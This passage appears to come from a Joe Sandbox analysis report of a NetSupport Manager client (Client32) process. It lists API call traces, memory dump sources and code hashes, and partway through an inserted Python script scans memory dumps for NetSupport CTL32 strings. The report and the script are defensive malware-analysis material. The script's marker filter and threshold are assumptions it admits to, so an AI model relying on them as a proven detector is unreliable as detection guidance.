                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • SystemParametersInfoA.USER32(00002000,00000000,00000001,00000000), ref: 1115F14F
                                                                                      • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F15C
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 1115F162
                                                                                      • SystemParametersInfoA.USER32(00002001,00000000,00000001,00000000), ref: 1115F177
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: InfoParametersSystem$ForegroundWindow$ErrorExitLastMessageProcesswsprintf
• String ID: ..\ctl32\wndclass.cpp$m_hWnd
• API String ID: 3960414890-2201682149
• Opcode ID: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
• Instruction ID: 490c9e9faa58dc1df28f1acf4c3aa341e93c1bd023cf24429d0d7fa3412acb83
• Opcode Fuzzy Hash: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
• Instruction Fuzzy Hash: 8F01F276790318BBE30096A9CC86F55F398EB54B14F104126F718AA1C0DAF1B851C7E1
APIs
• LoadMenuA.USER32(00000000,00002EFF), ref: 1100338E
• GetSubMenu.USER32(00000000,00000000), ref: 110033BA
• GetSubMenu.USER32(00000000,00000000), ref: 110033DC
• DestroyMenu.USER32(00000000), ref: 110033EA
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the first entry above (source file 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, offset 11000000, based on PE; snapshot hcaresult_4_2_11000000_bild.jbxd).
Yara matches
Similarity
• API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 468487828-934300333
• Opcode ID: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
• Instruction ID: f68e039685e14a294959d37ff9e7a7cb7630811a32528fcef7aaec2fda1b7dd6
• Opcode Fuzzy Hash: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
• Instruction Fuzzy Hash: 2FF0E93AF8466933E312A1F53C85F5BE74C9B515ECF450031F528EAA80EE54A80041AA
APIs
• LoadMenuA.USER32(00000000,00002EF9), ref: 1100329D
• GetSubMenu.USER32(00000000,00000000), ref: 110032C3
• GetMenuItemCount.USER32(00000000), ref: 110032E7
• DestroyMenu.USER32(00000000), ref: 110032F9
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the first entry above (source file 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, offset 11000000, based on PE; snapshot hcaresult_4_2_11000000_bild.jbxd).
Yara matches
Similarity
• API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 4241058051-934300333
• Opcode ID: f8a0d47e41078153cbecec3a6fa3cf51a8fd2ba3eb994fe06476dedbffd054b5
• Instruction ID: ea916ae31ccda8615c5aa97c2145fcab3b24ed556d1c3993920dd856584db00e
• Opcode Fuzzy Hash: f8a0d47e41078153cbecec3a6fa3cf51a8fd2ba3eb994fe06476dedbffd054b5
• Instruction Fuzzy Hash: F8F02E3EE945BA73D31266F53C0DF8BFA584F526ACB060030F434FA645EE14A40081A6
APIs
• GetClientRect.USER32(?,?), ref: 11119200
• ClientToScreen.USER32(?,?), ref: 11119241
• GetCursorPos.USER32(?), ref: 111192A1
• GetTickCount.KERNEL32 ref: 111192B6
• GetTickCount.KERNEL32 ref: 11119337
• WindowFromPoint.USER32(?,?,?,?), ref: 1111939A
• WindowFromPoint.USER32(000000FF,?), ref: 111193AE
• SetCursorPos.USER32(000000FF,?,?,?), ref: 111193C2
Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the first entry above (source file 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, offset 11000000, based on PE; snapshot hcaresult_4_2_11000000_bild.jbxd).
Yara matches
Similarity
• API ID: ClientCountCursorFromPointTickWindow$RectScreen
• String ID:
• API String ID: 4245181967-0
• Opcode ID: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
• Instruction ID: c3d26e7f0e5f190f00e8d03b3c013bb68f2031b9d5661d68f26c10068d749f7e
• Opcode Fuzzy Hash: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
• Instruction Fuzzy Hash: 6391F6B5A0060A9FDB14DFB4D588AEEF7F5FB88314F10452ED86A9B244E735B841CB60
APIs
• GetWindowTextA.USER32(?,?,00000050), ref: 11025176
• _strncat.LIBCMT ref: 1102518B
• SetWindowTextA.USER32(?,?), ref: 11025198
  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
• GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025224
• GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025238
• SetDlgItemTextA.USER32(?,00001397,?), ref: 11025250
• SetDlgItemTextA.USER32(?,00001395,?), ref: 11025262
• SetFocus.USER32(?), ref: 11025265
  • Part of subcall function 11024C70: GetDlgItem.USER32(?,?), ref: 11024CC0
Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the first entry above (source file 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, offset 11000000, based on PE; snapshot hcaresult_4_2_11000000_bild.jbxd).
Yara matches
Similarity
• API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
• String ID:
• API String ID: 3832070631-0
• Opcode ID: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
• Instruction ID: 7712de199883e751ea03bfa735f50b434bc7bb1cc5edca5bff12a9cf5cd7df4a
• Opcode Fuzzy Hash: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
• Instruction Fuzzy Hash: 0E4192B5A10359ABE710DB74CC45BBAF7F8FB44714F01452AE61AD76C0EAB4A904CB50
APIs
• EnterCriticalSection.KERNEL32(?,4012B9B4,75BF7CB0,75BF7AA0,?,75BF7CB0,75BF7AA0), ref: 11071554
• LeaveCriticalSection.KERNEL32(?), ref: 11071568
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
• LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110716E1
Strings
Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the first entry above (source file 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, offset 11000000, based on PE; snapshot hcaresult_4_2_11000000_bild.jbxd).
Yara matches
Similarity
• API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
• String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue
• API String ID: 624642848-3840833929
• Opcode ID: 0c8d2ced26a2bd08ab4c29fa8ca54adca0efbc1028afe9b50eb6db0bcfa7742a
• Instruction ID: f6d3c874c1d1c48a5cbc4b1d223e4c094ec3a892b4c0f1e6412567ed65325da8
• Opcode Fuzzy Hash: 0c8d2ced26a2bd08ab4c29fa8ca54adca0efbc1028afe9b50eb6db0bcfa7742a
• Instruction Fuzzy Hash: F061C775E04285DFD715CF68C480FAABBF6FB08318F0985A9E8968B2C1D774E944CB94
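The String ID fields in the entries above (..\ctl32\wndclass.cpp, ..\CTL32\annotate.cpp, ..\ctl32\Connect.cpp, the "Register NC_CHATEX for conn=%s, q=%p" format string) and the Client32 caption that the shared error handler at 11029450 passes to MessageBoxA are the kind of artefact a responder turns into a memory-dump check. The script below is an added example, not Joe Sandbox or NetSupport code: it splits the report's '$'-separated String ID fields into scan markers, searches a byte buffer for them (source paths case-insensitively, since the report shows both ctl32 and CTL32), and only flags the buffer when more than one distinct CTL32 marker is present, so a lone Client32 caption in an unrelated process does not fire. The dump buffers are constructed for the example, and the marker filter and two-marker threshold are this example's assumptions, not something the report states.

```python
"""Scan a memory dump for the NetSupport CTL32 strings listed in this report.

Added example (not Joe Sandbox or NetSupport code). The String ID fields are
copied from the report entries above; the dump buffers are constructed.
"""
from __future__ import annotations

import re

# String ID fields exactly as the report prints them, '$'-separated.
STRING_ID_FIELDS = [
    r"..\ctl32\wndclass.cpp$m_hWnd",
    r"..\CTL32\annotate.cpp$hMenu$hSub",
    r"..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue",
]

# Caption passed to MessageBoxA by the shared error handler at 11029450.
ERROR_CAPTION = "Client32"


def markers_from_string_id(field: str) -> list[str]:
    """Split one String ID field on '$' and keep only the distinctive parts:
    source paths (contain a backslash) and format strings (contain '%').
    Short identifiers such as 'queue' or 'hMenu' are dropped as too noisy
    (this filter is the example's own choice)."""
    return [p for p in field.split("$") if p and ("\\" in p or "%" in p)]


def build_markers() -> list[str]:
    """Collect the scan list: every distinctive String ID part plus the caption."""
    found = {m for f in STRING_ID_FIELDS for m in markers_from_string_id(f)}
    return sorted(found) + [ERROR_CAPTION]


MARKERS = build_markers()


def scan_dump(data: bytes) -> dict[str, list[int]]:
    """Return {marker: [offsets]} for each marker present in the dump.

    Source paths are matched case-insensitively because the report shows both
    'ctl32' and 'CTL32'; the format string and the caption are matched exactly.
    """
    hits: dict[str, list[int]] = {}
    for marker in MARKERS:
        flags = re.IGNORECASE if "\\" in marker else 0
        pattern = re.compile(re.escape(marker.encode("latin-1")), flags)
        offsets = [m.start() for m in pattern.finditer(data)]
        if offsets:
            hits[marker] = offsets
    return hits


def looks_like_netsupport_client(hits: dict[str, list[int]], min_distinct: int = 2) -> bool:
    """Flag only when at least two distinct CTL32 markers (not counting the
    generic 'Client32' caption) are present. The threshold is an assumption
    of this example, chosen so a lone caption string does not trigger."""
    return sum(1 for m in hits if m != ERROR_CAPTION) >= min_distinct


# Constructed dump fragments: one that resembles the client32 image region
# described in the report, one that only carries the caption.
SAMPLE_DUMP = (
    b"\x00" * 64
    + b"..\\CTL32\\annotate.cpp\x00"
    + b"hMenu\x00hSub\x00"
    + b"\x90" * 32
    + b"Client32\x00"
    + b"Register NC_CHATEX for conn=%s, q=%p\x00"
    + b"\x00" * 16
)
CLEAN_DUMP = b"Client32\x00" + b"\x00" * 100

if __name__ == "__main__":
    for name, dump in (("sample", SAMPLE_DUMP), ("clean", CLEAN_DUMP)):
        found = scan_dump(dump)
        verdict = "NetSupport CTL32 markers" if looks_like_netsupport_client(found) else "no verdict"
        print(f"{name}: {verdict}")
        for marker, offsets in found.items():
            print(f"  {marker!r} at {[hex(o) for o in offsets]}")
```

To run it against a real dump, read the .sdmp file as bytes and pass it to scan_dump; the offsets it returns are relative to the start of the buffer, so add the dump's base (11000000 for the source file above) to map a hit back to the report's addresses.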
APIs
  • Part of subcall function 110CEC60: CreateDialogParamA.USER32(00000000,?,1112D7C9,110CBCD0,00000000), ref: 110CECF1
  • Part of subcall function 110CEC60: GetLastError.KERNEL32 ref: 110CEE49
  • Part of subcall function 110CEC60: wsprintfA.USER32 ref: 110CEE78
  • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
  • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
• GetWindowLongA.USER32(?,000000EC), ref: 110931C9
• SetWindowLongA.USER32(?,000000EC,00000000), ref: 110931F7
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
• GetWindowLongA.USER32(?,000000F0), ref: 11093220
• SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109324E
Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 3136964118-2830328467
APIs
• PlaySoundA.WINMM(1000,50,00000000,00020001), ref: 11143451
  • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
• Beep.KERNEL32(00000000,00000000), ref: 11143415
• MessageBeep.USER32(00000000), ref: 11143427
• MessageBeep.USER32(-00000010), ref: 1114343B
• MessageBeep.USER32(00000000), ref: 1114345D
Strings
Similarity
• API ID: Beep$Message$PlaySound__isdigit_l
• String ID: 1000,50
• API String ID: 3904670044-1941404556
APIs
Strings
Similarity
• API ID: wsprintf
• String ID: ..\CTL32\configplus.cpp$result <= buflen
• API String ID: 2111968516-413741496
APIs
• GetForegroundWindow.USER32(75BF7AA0,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9017
• GetCursorPos.USER32(110BFEBC), ref: 110B9026
  • Part of subcall function 1115E6F0: GetWindowRect.USER32(?,?), ref: 1115E70C
• PtInRect.USER32(110BFEBC,110BFEBC,110BFEBC), ref: 110B9044
• ClientToScreen.USER32(?,110BFEBC), ref: 110B9066
• SetCursorPos.USER32(110BFEBC,110BFEBC,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9074
• LoadCursorA.USER32(00000000,00007F00), ref: 110B9081
• SetCursor.USER32(00000000,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9088
Similarity
• API ID: Cursor$RectWindow$ClientForegroundLoadScreen
• String ID:
• API String ID: 3235510773-0
APIs
• InterlockedDecrement.KERNEL32(?), ref: 1100B280
• EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2B9
• EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2D8
  • Part of subcall function 1100A1D0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A1EE
  • Part of subcall function 1100A1D0: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A218
  • Part of subcall function 1100A1D0: GetLastError.KERNEL32 ref: 1100A220
  • Part of subcall function 1100A1D0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A234
  • Part of subcall function 1100A1D0: CloseHandle.KERNEL32(00000000), ref: 1100A23B
• waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BE6B,?,00000000,00000002), ref: 1100B2E8
• LeaveCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2EF
• _free.LIBCMT ref: 1100B2F8
• _free.LIBCMT ref: 1100B2FE
Similarity
• API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
• String ID:
• API String ID: 705253285-0
APIs
• _memset.LIBCMT ref: 1101D0FE
• LoadIconA.USER32(00000000,0000139A), ref: 1101D14F
• LoadCursorA.USER32(00000000,00007F00), ref: 1101D15F
• RegisterClassExA.USER32(00000030), ref: 1101D181
• GetLastError.KERNEL32 ref: 1101D187
Strings
Similarity
• API ID: Load$ClassCursorErrorIconLastRegister_memset
• String ID: 0
• API String ID: 430917334-4108050209
                                                                                      APIs
                                                                                      • LoadMenuA.USER32(00000000,00002EFD), ref: 1100331D
                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                      • DestroyMenu.USER32(00000000), ref: 11003372
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                      • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                      • API String ID: 468487828-934300333
                                                                                      • Opcode ID: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
                                                                                      • Instruction ID: e80103f9713123d07a9bceb05cb6f887813353322251b2c4d1aa2998eabbc516
                                                                                      • Opcode Fuzzy Hash: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
                                                                                      • Instruction Fuzzy Hash: E5F0A73EF9466933D31666F53D1AF4BAB485B815ACB060031F524EA740EE14B4018166
                                                                                      APIs
                                                                                      • OpenThread.KERNEL32(0000004A,00000000,11147278,?,?,?,?,?,11147278), ref: 1114713A
                                                                                      • CreateThread.KERNEL32(00000000,00001000,111470B0,?,00000000,?), ref: 1114715E
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,11147278), ref: 11147169
                                                                                      • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,11147278), ref: 11147174
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,11147278), ref: 11147181
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,11147278), ref: 11147187
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 180989782-0
                                                                                      • Opcode ID: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                      • Instruction ID: 262247fb5796f255492f056fed215dfab2d13c04184fcb9cbdc2136a2e7489e8
                                                                                      • Opcode Fuzzy Hash: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                      • Instruction Fuzzy Hash: 6901FA75D14219ABDB04DFA8C845BAEBBB8EF08710F108166F924E7284D774AA018B91
                                                                                      APIs
                                                                                      • SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
                                                                                      • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
                                                                                      • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$EventObjectSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 2857295742-0
                                                                                      • Opcode ID: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                      • Instruction ID: 8ed48fa67f8c8c814876f8dc7215a606f8693e2702a4d531ac155f54366f369e
                                                                                      • Opcode Fuzzy Hash: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                      • Instruction Fuzzy Hash: 46011A75A087049BE7A0DFB988D4A96F7ECEF58300F11592EE5AAC3200CB78B8448F50
                                                                                      APIs
                                                                                      • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 1107712B
                                                                                        • Part of subcall function 11076470: DeferWindowPos.USER32(8B000EA9,00000000,D8E85BC0,33CD335E,?,00000000,33CD335E,110771C6), ref: 110764B3
                                                                                      • EqualRect.USER32(?,?), ref: 1107713C
                                                                                      • SetWindowPos.USER32(00000000,00000000,?,33CD335E,D8E85BC0,8B000EA9,00000014,?,?,?,?,?,1107731A,00000000,?), ref: 11077196
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077172
                                                                                      • m_hWnd, xrefs: 11077177
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
